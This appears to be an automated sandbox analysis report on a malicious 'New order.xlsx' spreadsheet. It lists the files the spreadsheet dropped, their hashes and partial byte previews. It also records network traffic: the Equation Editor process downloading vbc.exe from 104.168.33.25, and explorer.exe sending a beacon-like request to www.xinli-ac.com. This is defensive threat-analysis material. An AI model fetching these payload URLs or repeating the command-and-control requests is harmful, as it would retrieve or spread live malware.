                                        Preview:]....)8.z.E....{T`Z2Kb.P.....$.Qd.23....)e....a...............W.g%........I..[h..5G.*.a=..(>.....{.....a....,..N.B.1.X.m..8..(}..........9....+.&.ol...x...x. .:.KHy.6..n4.bJOt.w s)...^..4........K.Vjx[.(.?.w.(...).U.....M..N,.c....AY.#.TkD.G.:TPc.K.y)8..x.....G..r2.h....U.!..1QdT23....)X..a....6.........@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.h.....^......R..2.K.Vjx[.(+?{.l%".Z.......M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..7.c.d..A.G#.T2D.\.:Tfc.b...y)8.zx.....G...2......U...$.Qd.23....)e....a..............@.$%...jqE.....@...G..W.@.... '"^.!$....V.:....|....X.m..8..7r.....I9p4......W.b.,o.<.y..W..........n4.bJOt.w s)...^M.4..NR.....K.Vjx[.(+?{.l%"..Z.U.....M..

                                        C:\Users\user\AppData\Local\Temp\nsbF6CE.tmp

                                        Download File
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):281488
                                        Entropy (8bit):7.6561639892830335
                                        Encrypted:false
                                        SSDEEP:6144:k9aVOIaeqlwmDKQqM8cSdvEgUH+fR+MwQd:IkOKqlDKxHcWMzGJw2
                                        MD5:C5E6696957D25D8DEC8049B2F737C62D
                                        SHA1:790E266C7FFAC4588626301B5090B6CA26B15020
                                        SHA-256:8694698785F5AF0E04B78A6E36103B65A3A50D825B77C1848D4EC35C8A471E36
                                        SHA-512:0744F7CEF46106D1CA98661B91928AC7C90494D65059EF062EA4A14AE419F2DFD97A84F2C9F6A49F81D1073B19326E849AE38500AA008D006CE34071C1453B6A
                                        Malicious:false
                                        Preview:........,...................A...............................................................................................................................................................................................................................................................G...................j...............................................................................................................................h...........!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\wqqynoeqp

                                        Download File
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4797
                                        Entropy (8bit):6.202556793925154
                                        Encrypted:false
                                        SSDEEP:96:oV6T0r9Eo29FYSfUCvAy6gsaW6pAMIVcZ8B0Fs8+u:oV6T0mFYwUKAyBVa1VRWFiu
                                        MD5:69750989332A51572B9E510D66ABBDCF
                                        SHA1:D74C3B8C3280B05B816E89D09C2AE9274403002C
                                        SHA-256:BB4AEE81C87AF317EF9CA3C2C3906B73E748391DEEDBDE1BEDDA841F8147EE44
                                        SHA-512:9E9F1DA33F13F2DF7BC626E56D1138AEE3EC44EDFF73FC5E8D97206B8EAC576D76E621C1C7168D17A6292F61EF3A6624D69F3B2D054888B9A67FC4114E2E1CB8
                                        Malicious:false
                                        Preview:VA5==.Y.Y......M=<.}.<0.]<.}.<0.U...=....===..Q=..9..-....U.===..e..i..9..-....Uc===..m..q..9..-....Un===..u..y..9..-....U.===..}...J-A..5..}@@.9...]..a..-.UA.v..U..Y..U...A~.o.-.TN..U@..A.......Q.aM..U====.A!Bx.....e...m...u....}....]...U..S.-...9T....Q..[>.M..e...5<B..M@..U====..!A ===.A!:x..Q...M...v.9=.Y..<.}.<0...5.=..9....5.=..-.1~..~A......5.=...5.>.....v.9=.3.LU.?==U.?==.1=...lLU.?==U.?==.5=.:.LU.?==U.?==.5=.Y.Y.<.}.<0.U...-===..e....J.=.3...==.............XaU.B==.}....5..5..v=..:e..:i..U..5.~^=..:e..:i.?.5..}=..Be....lLUx>==.Uo....QX<..U...5U.....Q.JQ=.C..M=XD..M>===..Mv.A=.Y.Y.<.}.<0.U....===..}....J.=.3...==.............XaU.A==.}<..===..5..5..v=..:}..:...9..5.~^=..:}..:...-..5.n^..:}..:...1.v.5..o@..2}..2...U..5.~^?..:}..:..B.5..}=..B}..3.LU_===.UV....Q.J%=.5..U..%.>X4..%..1..-..9..5U.....Q.JQ=.C..M=XD..M>===..Mv.1=.Y.Y)...-===..a....J.=.3...==.............XaU.@==.}....5..5..v=..:a..:U..9..5.~^=..:a..:U.?.5..}=..Ba..:.LU"===.U.....QX;..9..5U...

                                        C:\Users\user\AppData\Local\Temp\~DF43C5C58FDDE0F3A8.TMP

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\~DFA5230667FEC71F99.TMP

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):95744
                                        Entropy (8bit):7.925838515197252
                                        Encrypted:false
                                        SSDEEP:1536:R9yvDYqJYNgVY6VdpHgqGFicn33zXfU7QY3S/u0vf51Ht5M9fdCdRJ85+3Qx:RSigV9nennzPBY3QV5M9FCdDW+3O
                                        MD5:70583AA55602C8BA0A7F85D815CB5806
                                        SHA1:7123ADF1A048A8168457DCB5AAA9FEAD90E40218
                                        SHA-256:4DA5CB33B2F19FC2D80CAFE3E9E9F1A7071D65724EA9316C86C1A635105BAB44
                                        SHA-512:B3E3F857E55F641BD1C7E25450A7D0126E3749459F998DEA905E03752F6F42A0950E086C55DBB3E632B889EC698566E71A396FD0971EB53180CFC61FB95E5246
                                        Malicious:false
                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                        C:\Users\user\AppData\Local\Temp\~DFDC892710C54AAC44.TMP

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\~DFFA1DA6C3CBA16E75.TMP

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\Desktop\~$New order.xlsx

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                        C:\Users\Public\vbc.exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):277920
                                        Entropy (8bit):7.911203365939466
                                        Encrypted:false
                                        SSDEEP:6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
                                        MD5:69250F55FBFE48822C838B4EEAF33A0A
                                        SHA1:3E4E1DD9DBEB98EC354F7A03D455A0A38CCEA4E5
                                        SHA-256:752D0155C769033832D6845EABBA29BCE2B9D0EEDFF734B31A49C879ED08FF72
                                        SHA-512:8BB1F40992A1E829D7B6CE9751DEC84D849C50BDF72A1BCD8DA9362C8CCA0521729F9031FCF6F19438C147702EB601B31FCEC9EA9E230E2A00B0ED9B679E6AA6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 37%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.925838515197252
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:New order.xlsx
                                        File size:95744
                                        MD5:70583aa55602c8ba0a7f85d815cb5806
                                        SHA1:7123adf1a048a8168457dcb5aaa9fead90e40218
                                        SHA256:4da5cb33b2f19fc2d80cafe3e9e9f1a7071d65724ea9316c86c1a635105bab44
                                        SHA512:b3e3f857e55f641bd1c7e25450a7d0126e3749459f998dea905e03752f6f42a0950e086c55dbb3e632b889ec698566e71a396fd0971eb53180cfc61fb95e5246
                                        SSDEEP:1536:R9yvDYqJYNgVY6VdpHgqGFicn33zXfU7QY3S/u0vf51Ht5M9fdCdRJ85+3Qx:RSigV9nennzPBY3QV5M9FCdDW+3O
                                        TLSH:F993F100F4AC60DAD5AA87BD8833F865C2299C81974EE5CD2D97374BF77C6824E322C5
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4e2aa8aa4b4bcb4

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 13, 2022 17:21:05.752494097 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:05.867383003 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.867619991 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:05.868827105 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:05.986473083 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986502886 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986537933 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986560106 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986582041 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986605883 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986628056 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986651897 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986669064 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986687899 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:05.986706018 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:05.986752033 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:05.986764908 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.050508976 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102085114 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102163076 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102196932 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102227926 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102262974 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102287054 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102298975 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102323055 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102355003 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102366924 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102392912 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102410078 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102442980 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102451086 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102478027 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102487087 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102514982 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102525949 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102550030 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102560997 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102586985 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102596998 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102622986 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102641106 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102674961 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102682114 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102708101 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102718115 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102742910 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102751970 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102775097 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.102786064 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.102818012 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.114017010 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217485905 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217550993 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217602968 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217638016 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217669010 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217693090 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217714071 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217736006 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217763901 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217781067 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217791080 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217822075 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217833996 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217860937 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217871904 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217902899 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217916012 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217942953 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.217952967 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217983007 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.217994928 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218024015 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218034029 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218060970 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218075037 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218106985 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218116999 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218144894 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218157053 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218187094 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218198061 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218225002 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218236923 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218266964 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218277931 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218305111 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218314886 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218347073 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218358040 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218386889 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218396902 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218430042 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218441010 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218466997 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218477011 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218509912 CEST8049171104.168.33.25192.168.2.22
                                        May 13, 2022 17:21:06.218522072 CEST4917180192.168.2.22104.168.33.25
                                        May 13, 2022 17:21:06.218548059 CEST4917180192.168.2.22104.168.33.25

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 13, 2022 17:22:14.484644890 CEST5586853192.168.2.228.8.8.8
                                        May 13, 2022 17:22:14.551302910 CEST53558688.8.8.8192.168.2.22
                                        May 13, 2022 17:22:30.809808969 CEST4968853192.168.2.228.8.8.8
                                        May 13, 2022 17:22:30.974128962 CEST53496888.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 13, 2022 17:22:14.484644890 CEST192.168.2.228.8.8.80xceeeStandard query (0)www.insurancecentral.infoA (IP address)IN (0x0001)
                                        May 13, 2022 17:22:30.809808969 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.xinli-ac.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 13, 2022 17:22:14.551302910 CEST8.8.8.8192.168.2.220xceeeName error (3)www.insurancecentral.infononenoneA (IP address)IN (0x0001)
                                        May 13, 2022 17:22:30.974128962 CEST8.8.8.8192.168.2.220xc4a9No error (0)www.xinli-ac.com154.222.70.249A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 104.168.33.25
                                        • www.xinli-ac.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249171104.168.33.2580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        May 13, 2022 17:21:05.868827105 CEST2OUTGET /gtb/vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 104.168.33.25
                                        Connection: Keep-Alive
                                        May 13, 2022 17:21:05.986473083 CEST3INHTTP/1.1 200 OK
                                        Date: Fri, 13 May 2022 15:21:05 GMT
                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                        Last-Modified: Fri, 13 May 2022 09:01:34 GMT
                                        ETag: "43da0-5dee0ebd81a80"
                                        Accept-Ranges: bytes
                                        Content-Length: 277920
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.2249172154.222.70.24980C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 13, 2022 17:22:31.353377104 CEST296OUTGET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1
                                        Host: www.xinli-ac.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 13, 2022 17:22:31.687582970 CEST297INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 May 2022 15:22:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 1736
                                        Connection: close
                                        Vary: Accept-Encoding
